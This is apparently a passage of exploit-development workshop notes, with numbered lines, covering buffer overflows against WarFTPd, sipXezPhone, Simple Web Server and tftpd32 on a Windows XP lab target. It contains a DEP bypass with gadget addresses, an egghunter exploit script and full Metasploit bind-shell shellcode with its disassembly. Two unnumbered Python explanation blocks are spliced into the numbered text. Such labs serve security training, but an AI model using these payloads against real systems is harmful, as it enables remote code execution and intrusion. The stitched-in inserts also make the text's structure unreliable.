  1546.  
  1547.  
  1548. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  1549.  
  1550. At WINDBG prompt
  1551. “r” to show registers or “alt+4”
  1552.  
  1553. dd esp
  1554.  
  1555.  
  1556.  
  1557.  
  1558. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  1559.  
  1560.  
  1561. At WINDBG prompt
  1562. “r” to show registers or “alt+4”
  1563. dd esp
  1564.  
  1565. Eip: 32714131
  1566. esp: affd58 (71413471)
  1567.  
  1568. Now we need to SSH into the StrategicSec Ubuntu host
  1569.  
  1570. cd /home/strategicsec/toolz/metasploit/tools
  1571.  
  1572. ruby pattern_offset.rb 32714131
  1573. 485
  1574.  
  1575. ruby pattern_offset.rb 71413471
  1576. 493
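All three pattern_offset results in these notes (252 for the SEH record in the sipXtapi crash, 485 and 493 for EIP and ESP here) come from one property of Metasploit's pattern: it is a run of unique three-byte triplets, uppercase letter, lowercase letter, digit, so any four bytes read out of a register at the crash pin down one position in the buffer. The following Python is an added example, not part of these notes and not Metasploit's own code; it reimplements pattern_create/pattern_offset and reproduces those offsets. The register value is taken the way WinDbg prints it (big-endian hex) and reversed to little-endian before searching, the same conversion pattern_offset.rb performs; the 3000-byte default length and the 20280-byte uniqueness limit are the only assumptions.

```python
#!/usr/bin/env python3
"""Cyclic crash-offset pattern, the idea behind Metasploit's
pattern_create.rb / pattern_offset.rb (added example, not Metasploit's code)."""
import string
from itertools import product

# The default character sets: uppercase, lowercase, digits.
SETS = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
MAX_UNIQUE = 26 * 26 * 10 * 3  # 20280 bytes before any 4-byte window repeats


def pattern_create(length):
    """Return `length` bytes of the pattern b'Aa0Aa1Aa2...Ab0...'.

    Every 4-byte window is unique while length <= MAX_UNIQUE; asking for
    more would make an offset lookup ambiguous, so refuse it.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_UNIQUE)
    out = bytearray()
    for upper, lower, digit in product(*SETS):
        out += (upper + lower + digit).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(register_value, length=3000):
    """Offset in the pattern of the 4 bytes that landed in a register.

    `register_value` is the value the debugger shows (e.g. 0x32714131 from
    `r` or `dd eip`), as an int or a hex string. x86 is little-endian, so
    the bytes in memory are the reverse of the displayed value; reverse
    before searching. Returns None when the value is not a pattern fragment
    (0x41414141 from a plain "A" buffer, for instance).
    """
    if isinstance(register_value, str):
        register_value = int(register_value, 16)
    needle = register_value.to_bytes(4, "little")
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    # Values quoted in the notes: EIP and ESP from the WarFTPD crash and the
    # SEH handler from the sipXtapi crash.
    for value in ("32714131", "71413471", "41346941"):
        print(value, "->", pattern_offset(value))
```

Running it prints 485, 493 and 252 for the three values, matching the Ruby tool; a lookup that returns None is the usual sign that the register holds something other than your pattern (plain filler, or a pointer into the pattern rather than pattern bytes), which is worth checking before trusting an offset.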
  1577.  
  1578.  
  1579.  
  1580.  
  1581.  
  1582.  
  1583.  
  1584.  
  1585. cd /home/strategicsec/toolz/metasploit/tools
  1586.  
  1587. ruby pattern_offset.rb 32714131
  1588.  
  1589. cd /home/strategicsec/toolz/metasploit/
  1590.  
  1591. ./msfbinscan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1592.  
  1593.  
  1594.  
  1595. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  1596.  
  1597. 0:003> dd eip
  1598. 0:003> dd esp
  1599.  
  1600. INT3s - GOOD!!!!!!!
  1601.  
  1602.  
  1603.  
  1604. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  1605.  
  1606. nc XPSP3-ED-Target-IP 4444
  1607.  
  1608.  
  1609. strategicsec....exploit no workie!!!!
  1610.  
  1611.  
  1612. Why????????? DEP!!!!!!!!!!!!!
  1613.  
  1614.  
  1615.  
  1616.  
  1617. Let's look through ole32.dll for the following instructions:
  1618.  
  1619. mov al,0x1
  1620. ret 0x4
  1621.  
  1622. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1623.  
  1624.  
  1625.  
  1626. ./msfbinscan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1627.  
  1628. [DLLs/xpsp3/ole32.dll]
  1629. 0x775ee00e b001c204
  1630. 0x775ee00e mov al, 1
  1631. 0x775ee010 ret 4
  1632.  
  1633.  
  1634. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1635. ntdll.dll that disables DEP.
  1636.  
  1637.  
  1638.  
  1639. Inside of ntdll.dll we need to find the following instructions:
  1640.  
  1641. CMP AL,1
  1642. PUSH 2
  1643. POP ESI
  1644. JE ntdll.7
  1645.  
  1646.  
  1647.  
  1648. ./msfbinscan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1649.  
  1650. [DLLs/xpsp3/ntdll.dll]
  1651. 0x7c91cd24 3c016a025e0f84
  1652. 0x7c91cd24 cmp al, 1
  1653. 0x7c91cd26 push 2
  1654. 0x7c91cd28 pop esi
  1655. 0x7c91cd29 jz 7
  1656.  
  1657.  
  1658. This set of instructions checks that AL is 1, then pushes 2 onto the stack and pops it
  1659. into ESI; with AL equal to 1 the JE is taken (the trace further down shows esi=00000002 and [br=1]).
  1660.  
  1661.  
  1662.  
  1663.  
  1664.  
  1665. dep = "\x0e\xe0\x5e\x77"+\
  1666. "\xff\xff\xff\xff"+\
  1667. "\x24\xcd\x91\x7c"+\
  1668. "\xff\xff\xff\xff"+\
  1669. "A"*0x54
  1670.  
  1671.  
  1672.  
  1673. #################################
  1674. # Start WarFTPd #
  1675. # Start WinDBG #
  1676. # Press F6 #
  1677. # Attach to war-ftpd.exe #
  1678. # bp 0x775ee00e #
  1679. # g #
  1680. #################################
  1681.  
  1682.  
  1683.  
  1684.  
  1685. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1686.  
  1687. ---------------------------------------------------------------------------
  1688. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1689.  
  1690. mov al,0x1
  1691. ret 0x4
  1692.  
  1693.  
  1694.  
  1695.  
  1696. 0:005> g
  1697. Breakpoint 0 hit
  1698. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1699. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1700. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1701. ole32!CSSMappedStream::IsWriteable:
  1702. 775ee00e b001 mov al,1
  1703.  
  1704.  
  1705. 0:001> t
  1706. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1707. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1708. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1709. ole32!CSSMappedStream::IsWriteable+0x2:
  1710. 775ee010 c20400 ret 4
  1711.  
  1712.  
  1713.  
  1714.  
  1715.  
  1716. ---------------------------------------------------------------------------
  1717. Ok, so inside of ntdll.dll we need to find the following instructions:
  1718.  
  1719. CMP AL,1
  1720. PUSH 2
  1721. POP ESI
  1722. JE ntdll.7
  1723.  
  1724. 0:001> t
  1725. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1726. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1727. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1728. ntdll!LdrpCheckNXCompatibility+0x13:
  1729. 7c91cd24 3c01 cmp al,1
  1730.  
  1731.  
  1732. 0:001> t
  1733. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1734. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1735. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1736. ntdll!LdrpCheckNXCompatibility+0x15:
  1737. 7c91cd26 6a02 push 2
  1738.  
  1739.  
  1740. 0:001> t
  1741. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1742. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1743. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1744. ntdll!LdrpCheckNXCompatibility+0x17:
  1745. 7c91cd28 5e pop esi
  1746.  
  1747.  
  1748. 0:001> t
  1749. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  1750. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1751. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1752. ntdll!LdrpCheckNXCompatibility+0x18:
  1753. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  1754.  
  1755.  
  1756. ---------------------------------------------------------------------------
  1757.  
  1758.  
  1759.  
  1760. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1761.  
  1762. nc XPSP3-ED-Target-IP 4444
  1763.  
  1764.  
  1765. ##################
  1766. # SEH Overwrites #
  1767. ##################
  1768.  
  1769. #################################################
  1770. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  1771. # Start sipXexPhone if it isn’t already running #
  1772. # Start WinDBG #
  1773. # Press “F6” and Attach to sipXexPhone.exe #
  1774. # Press “F5” to start the debugger #
  1775. #################################################
  1776.  
  1777.  
  1778. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  1779.  
  1780.  
  1781.  
  1782. python sipex0.py XPSP3-ED-Target-IP
  1783.  
  1784. 0:003> !exchain
  1785. 0:003> dds esp
  1786. 0:003> dds
  1787.  
  1788. python sipex1.py XPSP3-ED-Target-IP
  1789.  
  1790. 0:003> !exchain
  1791. 0:003> g
  1792.  
  1793. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  1794.  
  1795.  
  1796. python sipex2.py XPSP3-ED-Target-IP
  1797.  
  1798. 0:003> !exchain
  1799. 0:003> g
  1800.  
  1801.  
  1802. ***ssh into instructor Ubuntu host***
  1803. cd /home/strategicsec/toolz/metasploit/tools
  1804. ruby pattern_offset.rb 41346941 <------- We should see that SEH is at 252
  1805.  
  1806.  
  1807.  
  1808. !load narly
  1809. !nmod
  1810.  
  1811. ***ssh into instructor Ubuntu host***
  1812. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  1813. cd /home/strategicsec/toolz/metasploit/
  1814. ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1815.  
  1816.  
  1817. #########################################
  1818. # sipex3.py in Notepad++. #
  1819. # Set cseq = 252 #
  1820. # Set seh2 address to: 0x10015977 #
  1821. #########################################
  1822.  
  1823.  
  1824. python sipex3.py XPSP3-ED-Target-IP
  1825. 0:003> !exchain
  1826.  
  1827. python sipex4.py XPSP3-ED-Target-IP
  1828.  
  1829.  
  1830.  
  1831. nc XPSP3-ED-Target-IP 4444
  1832.  
  1833.  
  1834.  
  1835.  
  1836. ################################
  1837. # Not Enough Space (Egghunter) #
  1838. ################################
  1839.  
  1840.  
  1841.  
  1842. SWS - SIMPLE WEB SERVER
  1843. -----------------------
  1844.  
  1845. Running SWS on Strategicsec-XP-ED-Target-VM
  1846. Start > Programs > Simple Web Server (it's in the middle somewhere)
  1847. Red icon in system tray
  1848. Double click it
  1849. - it will pop up a menu
  1850. - select "start"
  1851. - dialog box shows starting params - port 82
  1852.  
  1853. WinDBG
  1854. - attach to "server.exe"
  1855.  
  1856.  
  1857. python sws1.py | nc XPSP3-ED-Target-IP 82
  1858.  
  1859.  
  1860.  
  1861. python sws2.py | nc XPSP3-ED-Target-IP 82
  1862.  
  1863.  
  1864. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  1865. cd /home/strategicsec/toolz/metasploit/tools
  1866. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  1867. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
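How those offsets come out of the crash values is worth seeing once in code. The block below is an added example, not part of the workshop files or of Metasploit: it rebuilds the pattern_create.rb sequence (Aa0Aa1Aa2...), reverses the little-endian register value the way pattern_offset.rb does, and parses a WinDBG "r" dump so the lookup can be run straight from the debugger text. It reproduces the numbers used on this page: 485 and 493 for the WarFTPd EIP/ESP values, 252 for the sipXezPhone SEH value and 225/229 for SWS. The register dump in SAMPLE_R is constructed (only the EIP value is the one recorded above).

```python
import re
import string
import struct
from functools import lru_cache

# Largest pattern with unique 3-char groups: 26 uppers x 26 lowers x 10 digits x 3 chars.
MAX_PATTERN = 26 * 26 * 10 * 3


@lru_cache(maxsize=None)
def cyclic_pattern(length=MAX_PATTERN):
    """Same sequence pattern_create.rb emits: Aa0Aa1Aa2...Ab0Ab1..., cut to length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(value):
    """Offset of a crashed register's value inside the pattern, or -1 if it is not pattern data.

    value is the 32-bit number WinDBG shows (int or hex string). The CPU stored the four
    pattern bytes little-endian, so packing with '<I' puts them back in buffer order.
    """
    if isinstance(value, str):
        value = int(value, 16)
    needle = struct.pack("<I", value).decode("latin-1")
    return cyclic_pattern().find(needle)


# Register assignments as WinDBG prints them for 'r' (iopl= and the flags are ignored).
REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|eip|esp|ebp)=([0-9a-fA-F]{8})")


def parse_registers(windbg_r_output):
    """Pull the 32-bit registers out of a WinDBG 'r' dump into a dict."""
    return {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(windbg_r_output)}


def triage(windbg_r_output):
    """Map each register that holds a piece of the pattern to its offset in the buffer."""
    result = {}
    for name, val in parse_registers(windbg_r_output).items():
        off = pattern_offset(val)
        if off >= 0:
            result[name] = off
    return result


# Constructed register dump: EIP is the value recorded for the WarFTPd crash above,
# the other registers are filler that does not occur in the pattern.
SAMPLE_R = (
    "eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000\n"
    "eip=32714131 esp=00affd58 ebp=00000000 iopl=0 nv up ei pl nz ac pe nc\n"
)

if __name__ == "__main__":
    print(triage(SAMPLE_R))            # {'eip': 485}
    print(pattern_offset("71413471"))  # 493, the dword that sat at ESP
```

Note that only 4-byte values that start on the right boundary are unique in this pattern; a value that comes back as -1 was either not pattern data at all (a real address such as 00affd58) or was mangled before the crash.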
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875.  
  1876. EGGHUNTER:
  1877. ----------
  1878.  
  1879. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1880. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1881.          ^^^^^^^^^^^^^^^^
  1882.          ABBA (the egg tag, \x41\x42\x42\x41)
  1883.  
  1884. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
  1885.                                    ^^^^^^^
  1886.                                    JMP ESP
  1887. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
  1888.  
  1889.  
  1890.  
  1891.  
  1892. -----sws3.py-----
  1893. #!/usr/bin/python2
  1894.  
  1895. import os # for output setting
  1896. import sys
  1897. import struct # for pack function
  1898.  
  1899. # turn off output buffer and set binary mode
  1900. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
  1901.  
  1902.  
  1903. pad = "A" * 225 # distance to EIP
  1904. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
  1905.  
  1906. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
  1907. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  1908.  
  1909. shellcode = "\xCC" * 700
  1910.  
  1911. buf = "GET /"
  1912. buf += pad + struct.pack('<I', eip) + egghunter
  1913. buf += " HTTP/1.0\r\n"
  1914. buf += "User-Agent: ABBAABBA"
  1915. buf += shellcode
  1916. buf += " HTTP/1.0\r\n"
  1917.  
  1918. sys.stdout.write(buf)
  1919. -----
  1920.  
  1921. ############################################
  1922. # Lab 2b: Not Enough Space (Negative Jump) #
  1923. ############################################
  1924.  
  1925. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
  1926.  
  1927.  
  1928. [pad = distance_to_seh - len(shellcode)] [shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
  1929.  
  1930. 1 - overflow the buffer: pad + shellcode + jmp4 + eip + jmp_min run from the start of the buffer through the SEH record
  1931.  
  1932. 2 - jump over the SEH record: jmp4 (nop, nop, jmp short +4) skips the 4-byte eip slot and lands in jmp_min
  1933.  
  1934. 3 - POP 2 words off the stack: the pop/pop/ret that eip points to returns into jmp4
  1935.  
  1936. 4 - negative jump into the NOPs, then into the shellcode: jmp_min jumps backwards over the shellcode into the pad
  1943.  
  1944.  
  1945. #################################
  1946. # Not Enough Space (Trampoline) #
  1947. #################################
  1948.  
  1949. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  1950. On the Strategicsec-XP-ED-Target-VM VM
  1951.  
  1952. - open a command prompt
  1953. - c:\software\tftpd32
  1954. - run tftpd32.exe
  1955. - UDP port 69
  1956. (socket code is already in the scripts)
  1957.  
  1958.  
  1959.  
  1960.  
  1961. On your attack host please install:
  1962.  
  1963.  
  1964. NASM - Netwide Assembler
  1965.  
  1966.  
  1967.  
  1968.  
  1969.  
  1970. -----------------------------------------------------------------------------------------------------------------
  1971.  
  1972.  
  1973. We want to generate the shellcode (BIND SHELL on Port 4444)
  1974. - No restricted characters
  1975. - Encoder: NONE
  1976.  
  1977. Create a Python file called dumpshellcode.py
  1978.  
  1979. ---
  1980. #!/usr/bin/python2
  1981.  
  1982. import os
  1983. import sys
  1984. import struct
  1985.  
  1986.  
  1987. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  1988. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1989. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1990. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1991. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1992. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1993. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1994. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1995. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1996. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1997. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1998. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1999. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  2000. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  2001. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  2002. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  2003. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  2004. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  2005. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  2006. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  2007. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  2008.  
  2009. sys.stdout.write(shellcode)
  2010. ---
  2011.  
  2012.  
  2013.  
  2014. python dumpshellcode.py > bindshell.bin
  2015.  
  2016. copy bindshell.bin into the "c:\Program Files\nasm" directory
  2017.  
  2018.  
  2019.  
  2020. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
  2021. 317 bindshell.bin
  2022.  
  2023. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  2024. 00000000 FC cld
  2025. 00000001 6AEB push byte -0x15
  2026. 00000003 4D dec ebp
  2027. 00000004 E8F9FFFFFF call dword 0x2
  2028. 00000009 60 pushad
  2029. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  2030. 0000000E 8B453C mov eax,[ebp+0x3c]
  2031. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  2032. 00000015 01EF add edi,ebp
  2033. 00000017 8B4F18 mov ecx,[edi+0x18]
  2034. 0000001A 8B5F20 mov ebx,[edi+0x20]
  2035. 0000001D 01EB add ebx,ebp
  2036. 0000001F 49 dec ecx
  2037. 00000020 8B348B mov esi,[ebx+ecx*4]
  2038. 00000023 01EE add esi,ebp
  2039. 00000025 31C0 xor eax,eax
  2040. 00000027 99 cdq
  2041. 00000028 AC lodsb
  2042. 00000029 84C0 test al,al
  2043. 0000002B 7407 jz 0x34
  2044. 0000002D C1CA0D ror edx,0xd
  2045. 00000030 01C2 add edx,eax
  2046. 00000032 EBF4 jmp short 0x28
  2047. 00000034 3B542428 cmp edx,[esp+0x28]
  2048. 00000038 75E5 jnz 0x1f
  2049. 0000003A 8B5F24 mov ebx,[edi+0x24]
  2050. 0000003D 01EB add ebx,ebp
  2051. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  2052. 00000043 8B5F1C mov ebx,[edi+0x1c]
  2053. 00000046 01EB add ebx,ebp
  2054. 00000048 032C8B add ebp,[ebx+ecx*4]
  2055. 0000004B 896C241C mov [esp+0x1c],ebp
  2056. 0000004F 61 popad
  2057. 00000050 C3 ret
  2058. 00000051 31DB xor ebx,ebx
  2059. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  2060. 00000057 8B400C mov eax,[eax+0xc]
  2061. 0000005A 8B701C mov esi,[eax+0x1c]
  2062. 0000005D AD lodsd
  2063. 0000005E 8B4008 mov eax,[eax+0x8]
  2064. 00000061 5E pop esi
  2065. 00000062 688E4E0EEC push dword 0xec0e4e8e
  2066. 00000067 50 push eax
  2067. 00000068 FFD6 call esi
  2068. 0000006A 6653 push bx
  2069. 0000006C 66683332 push word 0x3233
  2070. 00000070 687773325F push dword 0x5f327377
  2071. 00000075 54 push esp
  2072. 00000076 FFD0 call eax
  2073. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  2074. 0000007D 50 push eax
  2075. 0000007E FFD6 call esi PART 1
  2076. 00000080 5F pop edi
  2077. 00000081 89E5 mov ebp,esp
  2078. 00000083 6681ED0802 sub bp,0x208
  2079. 00000088 55 push ebp
  2080. 00000089 6A02 push byte +0x2
  2081. 0000008B FFD0 call eax
  2082. 0000008D 68D909F5AD push dword 0xadf509d9
  2083. 00000092 57 push edi
  2084. 00000093 FFD6 call esi
  2085. 00000095 53 push ebx
  2086. 00000096 53 push ebx
  2087. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  2088. 00000097 53 push ebx
  2089. 00000098 53 push ebx
  2090. 00000099 53 push ebx
  2091. 0000009A 43 inc ebx
  2092. 0000009B 53 push ebx
  2093. 0000009C 43 inc ebx
  2094. 0000009D 53 push ebx PART 2
  2095. 0000009E FFD0 call eax
  2096. 000000A0 6668115C push word 0x5c11
  2097. 000000A4 6653 push bx
  2098. 000000A6 89E1 mov ecx,esp
  2099. 000000A8 95 xchg eax,ebp
  2100. 000000A9 68A41A70C7 push dword 0xc7701aa4
  2101. 000000AE 57 push edi
  2102. 000000AF FFD6 call esi
  2103. 000000B1 6A10 push byte +0x10
  2104. 000000B3 51 push ecx
  2105. 000000B4 55 push ebp
  2106. 000000B5 FFD0 call eax
  2107. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  2108. 000000BC 57 push edi
  2109. 000000BD FFD6 call esi
  2110. 000000BF 53 push ebx
  2111. 000000C0 55 push ebp
  2112. 000000C1 FFD0 call eax
  2113. 000000C3 68E5498649 push dword 0x498649e5
  2114. 000000C8 57 push edi
  2115. 000000C9 FFD6 call esi
  2116. 000000CB 50 push eax
  2117. 000000CC 54 push esp
  2118. 000000CD 54 push esp
  2119. 000000CE 55 push ebp
  2120. 000000CF FFD0 call eax
  2121. 000000D1 93 xchg eax,ebx
  2122. 000000D2 68E779C679 push dword 0x79c679e7
  2123. 000000D7 57 push edi
  2124. 000000D8 FFD6 call esi
  2125. 000000DA 55 push ebp
  2126. 000000DB FFD0 call eax
  2127. 000000DD 666A64 push word 0x64
  2128. 000000E0 6668636D push word 0x6d63
  2129. 000000E4 89E5 mov ebp,esp
  2130. 000000E6 6A50 push byte +0x50
  2131. 000000E8 59 pop ecx
  2132. 000000E9 29CC sub esp,ecx
  2133. 000000EB 89E7 mov edi,esp
  2134. 000000ED 6A44 push byte +0x44
  2135. 000000EF 89E2 mov edx,esp
  2136. 000000F1 31C0 xor eax,eax
  2137. 000000F3 F3AA rep stosb
  2138. 000000F5 FE422D inc byte [edx+0x2d]
  2139. 000000F8 FE422C inc byte [edx+0x2c]
  2140. 000000FB 93 xchg eax,ebx
  2141. 000000FC 8D7A38 lea edi,[edx+0x38]
  2142. 000000FF AB stosd
  2143. 00000100 AB stosd
  2144. 00000101 AB stosd
  2145. 00000102 6872FEB316 push dword 0x16b3fe72
  2146. 00000107 FF7544 push dword [ebp+0x44]
  2147. 0000010A FFD6 call esi
  2148. 0000010C 5B pop ebx
  2149. 0000010D 57 push edi
  2150. 0000010E 52 push edx
  2151. 0000010F 51 push ecx
  2152. 00000110 51 push ecx
  2153. 00000111 51 push ecx
  2154. 00000112 6A01 push byte +0x1
  2155. 00000114 51 push ecx
  2156. 00000115 51 push ecx
  2157. 00000116 55 push ebp
  2158. 00000117 51 push ecx
  2159. 00000118 FFD0 call eax
  2160. 0000011A 68ADD905CE push dword 0xce05d9ad
  2161. 0000011F 53 push ebx
  2162. 00000120 FFD6 call esi
  2163. 00000122 6AFF push byte -0x1
  2164. 00000124 FF37 push dword [edi]
  2165. 00000126 FFD0 call eax
  2166. 00000128 8B57FC mov edx,[edi-0x4]
  2167. 0000012B 83C464 add esp,byte +0x64
  2168. 0000012E FFD6 call esi
  2169. 00000130 52 push edx
  2170. 00000131 FFD0 call eax
  2171. 00000133 68F08A045F push dword 0x5f048af0
  2172. 00000138 53 push ebx
  2173. 00000139 FFD6 call esi
  2174. 0000013B FFD0 call eax
  2175.  
  2176.  
  2177.  
  2178.  
  2179. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  2180. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  2181. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  2182. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  2183. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  2184. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  2185. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  2186. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  2187. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  2188. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  2189.  
  2190.  
  2191. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  2192. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  2193. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
